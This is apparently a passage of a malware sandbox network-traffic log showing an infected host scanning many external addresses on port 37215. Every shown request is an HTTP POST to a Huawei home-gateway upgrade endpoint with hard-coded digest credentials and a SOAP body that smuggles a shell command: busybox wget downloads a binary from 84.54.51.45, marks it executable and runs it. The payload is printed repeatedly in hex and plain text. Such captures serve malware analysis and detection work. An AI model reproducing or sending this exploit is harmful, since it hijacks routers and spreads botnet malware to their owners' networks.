2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            2402192.168.2.153862641.221.52.7137215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:18.810503006 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            2403192.168.2.153945641.100.144.11537215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:18.810530901 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            2404192.168.2.154051641.116.17.7137215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:18.810601950 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            2405192.168.2.153712241.76.200.1037215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:18.810614109 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            2406192.168.2.155366241.125.123.21437215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:18.810689926 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            2407192.168.2.155215641.34.159.15337215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:18.810719967 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            2408192.168.2.155885041.187.28.10537215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:18.810751915 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            2409192.168.2.153603241.71.138.11137215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:18.810777903 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            2410192.168.2.153838641.191.22.4037215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:18.810802937 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            2411192.168.2.155280241.156.207.24737215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:18.810851097 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            2412192.168.2.153611841.21.28.24137215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:18.810909986 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
